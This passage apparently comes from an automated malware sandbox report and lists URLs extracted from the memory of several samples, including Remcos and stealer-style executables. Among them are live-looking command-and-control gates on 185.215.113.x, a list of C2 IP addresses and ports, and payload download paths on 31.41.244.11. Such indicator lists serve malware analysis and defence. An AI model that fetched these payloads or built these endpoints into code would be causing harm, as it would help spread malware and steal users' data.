Source: c2a8de8bf3.exe, 0000001C.00000002.2630997068.000000000123A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/m
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/n
Source: c2a8de8bf3.exe, 0000001C.00000002.2630997068.000000000123A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php1
Source: c2a8de8bf3.exe, 00000020.00000002.2792882659.00000000012BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php:
Source: ed55d3f620.exe, 0000001A.00000002.2854646925.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpH
Source: c2a8de8bf3.exe, 00000020.00000002.2792882659.00000000012BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpJ
Source: c2a8de8bf3.exe, 0000001C.00000002.2630997068.000000000123A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpQ
Source: file.exe, 00000000.00000002.2007571138.0000000023943000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpTg
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpThe
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpW
Source: ed55d3f620.exe, 0000001A.00000002.2854646925.0000000005421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpX
Source: c2a8de8bf3.exe, 0000001C.00000002.2630997068.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpa-7368302a1ad4
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phph
Source: ed55d3f620.exe, 0000001A.00000002.2848105530.00000000007A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpindows
Source: file.exe, 00000000.00000002.1988015001.00000000009DE000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpion:
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpo
Source: file.exe, 00000000.00000002.2007571138.0000000023943000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phptf
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpty
Source: c2a8de8bf3.exe, 0000001C.00000002.2630997068.000000000123A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpu
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/7
Source: file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/freebl3.dllo
Source: file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/freebl3.dllu
Source: file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/mozglue.dll
Source: file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/msvcp140.dll
Source: file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/msvcp140.dll9
Source: file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/nss3.dll
Source: file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/softokn3.dll
Source: file.exe, 00000000.00000002.1989629326.0000000001587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/sqlite3.dll
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/vcruntime140.dll
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/746f34465cf17784/vcruntime140.dllk
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/:
Source: ed55d3f620.exe, 0000001E.00000003.2867187034.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/C:
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/Q
Source: c2a8de8bf3.exe, 00000020.00000002.2792882659.000000000126B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/RRC:
Source: ed55d3f620.exe, 0000001A.00000002.2848105530.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/fnkdnaad:
Source: ed55d3f620.exe, 0000001A.00000002.2848105530.0000000000809000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/lkmhmclhkeeodmamcflcX
Source: c2a8de8bf3.exe, 0000001C.00000002.2630997068.000000000123A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ws
Source: c2a8de8bf3.exe, 00000020.00000002.2792882659.000000000126B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206J
Source: c2a8de8bf3.exe, 00000020.00000002.2792882659.000000000126B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206jBv
Source: file.exe, 00000000.00000002.1988015001.00000000009DE000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206s4adf523b719729.phpion:
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.2929148209.000000000159F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php/h
Source: skotes.exe, 0000000B.00000002.2929148209.000000000154B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpG
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpesf
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedP
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedz
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/a
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/fac00b58987e8e4f4b2846d934f48b15eaa495c49###
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ones
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:80
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://194.164.198.113:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://20.78.55.47:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.166.251.4:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://209.38.221.184:8080
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/buildd.exe
Source: skotes.exe, 0000000B.00000002.2929148209.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/buildd.exeX
Source: skotes.exe, 0000000B.00000002.2929148209.000000000159F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/remcos_a.exe
Source: skotes.exe, 0000000B.00000002.2929148209.000000000159F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/remcos_a.exe62coded
Source: skotes.exe, 0000000B.00000002.2929148209.000000000159F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/remcos_a.exelencoded
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://38.207.174.88:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://38.60.191.38:80
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://41.87.207.180:9090
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://46.235.26.83:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.96.78.224:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.159.4.50:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://65.49.205.24:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://67.230.176.97:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.216.92.21:8080
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.219.110.16:9999
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://8.222.143.111:8080
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ed55d3f620.exe, 0000001A.00000003.2599816551.0000000005431000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2715340259.000000000571D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: ed55d3f620.exe, 0000001A.00000003.2599816551.0000000005431000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2715340259.000000000571D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ed55d3f620.exe, 0000001A.00000003.2599816551.0000000005431000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2715340259.000000000571D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: ed55d3f620.exe, 0000001A.00000003.2599816551.0000000005431000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2715340259.000000000571D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ed55d3f620.exe, 0000001A.00000003.2599816551.0000000005431000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2715340259.000000000571D000.00000004.00000800.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ed55d3f620.exe, 0000001A.00000003.2599816551.0000000005431000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2715340259.000000000571D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: ed55d3f620.exe, 0000001A.00000003.2599816551.0000000005431000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2715340259.000000000571D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: remcos_a.exe, 0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp, remcos_a.exe, 0000000C.00000003.2419805478.0000000004800000.00000004.00001000.00020000.00000000.sdmp, remcos.exe, 0000000D.00000002.2922707020.0000000000401000.00000040.00000001.01000000.00000011.sdmp, remcos.exe, 0000000D.00000003.2453130282.0000000004800000.00000004.00001000.00020000.00000000.sdmp, remcos.exe, 0000001B.00000003.2584176441.0000000004800000.00000004.00001000.00020000.00000000.sdmp, remcos.exe, 0000001B.00000002.2624639013.0000000000401000.00000040.00000001.01000000.00000011.sdmp, remcos.exe, 00000022.00000003.2918030164.0000000004800000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA888A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA888A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line?fields=query
Source: ed55d3f620.exe, 0000001A.00000003.2599816551.0000000005431000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2715340259.000000000571D000.00000004.00000800.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: ed55d3f620.exe, 0000001A.00000003.2599816551.0000000005431000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2715340259.000000000571D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2013330037.000000006F8ED000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2004793926.000000001D915000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2012224390.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: ed55d3f620.exe, 0000001A.00000003.2599816551.0000000005431000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2715340259.000000000571D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: ed55d3f620.exe, 0000001A.00000003.2599816551.0000000005431000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2715340259.000000000571D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://138.2.92.67:443
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://154.9.207.142:443
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://185.217.98.121:443
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://192.99.196.191:443
Source: buildd.exe, 0000000E.00000002.2501434098.000001DBA8801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://5.196.181.135:443
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A3E000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555997742.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555074919.0000000005457000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683862699.0000000005687000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684219896.0000000005628000.00000004.00000800.00020000.00000000.sdmp, JJDBFCAE.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2611348298.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734267620.000000000100C000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734267620.000000000100C000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A3E000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555997742.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555074919.0000000005457000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683862699.0000000005687000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684219896.0000000005628000.00000004.00000800.00020000.00000000.sdmp, JJDBFCAE.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A3E000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555997742.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555074919.0000000005457000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683862699.0000000005687000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684219896.0000000005628000.00000004.00000800.00020000.00000000.sdmp, JJDBFCAE.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A3E000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555997742.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555074919.0000000005457000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683862699.0000000005687000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684219896.0000000005628000.00000004.00000800.00020000.00000000.sdmp, JJDBFCAE.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2611348298.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734267620.000000000100C000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734267620.000000000100C000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, file.exe, 00000000.00000003.1669066105.00000000051FB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2013089860.000000006CEF1000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1988015001.000000000079C000.00000040.00000001.01000000.00000003.sdmp, ed55d3f620.exe, 0000001A.00000002.2855529774.0000000005CCC000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2794443992.000000000820B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 0000001C.00000003.2576226521.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 0000001C.00000002.2629001763.000000000041C000.00000040.00000001.01000000.00000016.sdmp, ed55d3f620.exe, 0000001E.00000002.2908134178.0000000005F1C000.00000040.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2858928335.000000000831B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 00000020.00000003.2738544511.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, c2a8de8bf3.exe, 00000020.00000002.2791492042.000000000041C000.00000040.00000001.01000000.00000016.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
